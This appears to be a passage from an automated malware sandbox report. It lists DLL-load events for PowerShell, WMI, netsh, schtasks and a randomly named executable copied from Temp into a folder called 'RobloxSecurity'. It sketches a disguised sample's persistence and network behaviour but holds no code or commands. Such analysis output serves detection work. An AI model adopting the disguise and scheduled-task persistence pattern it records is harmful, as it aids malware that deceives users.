Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
